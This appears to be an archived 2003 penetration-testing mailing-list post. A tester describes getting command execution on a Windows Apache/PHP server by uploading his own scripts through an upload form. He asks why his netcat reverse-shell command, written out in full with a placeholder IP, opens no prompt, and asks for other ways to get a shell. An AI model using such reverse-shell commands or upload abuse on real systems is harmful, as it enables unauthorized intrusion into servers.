Penetration Testing mailing list archives
php and netcat?
From: "Maarten" <secfocus () hartsuijker com>
Date: Tue, 18 Feb 2003 20:24:05 +0100
Hi, I am testing a windows based apache server, that's got php and mysql installed on it. I found a php script that allows uploading other php scripts. The upload directory is also readable and executable. So I have uploaded some of my own scripts and can execute any command I want using `cmd /c command.exe` I am looking for ways to further exploit this server. The file system is probably "everyone full control". Have not tested that yet. What I tried to do was using netcat to send a command shell to my own machine (cmd /c nc 333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver contacts my own machine on port 333, however, I do not get a command prompt like I am getting when running the same netcat command from the command prompt of a windows machine. Anyone know why? If anyone knows an alternative to get a shell on the server, I would also appreciate it. Of course I can run any command through php, but there should be alternatives..... An alternative to my netcat idea is also appreciated }-) maarten ---------------------------------------------------------------------------- Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box? CORE IMPACT does. www.securityfocus.com/core
Current thread:
- php and netcat? Maarten (Feb 19)
- Re: php and netcat? Alexandre Carmel-Veilleux (Feb 19)
- <Possible follow-ups>
- Re: php and netcat? Vlad G. (Feb 19)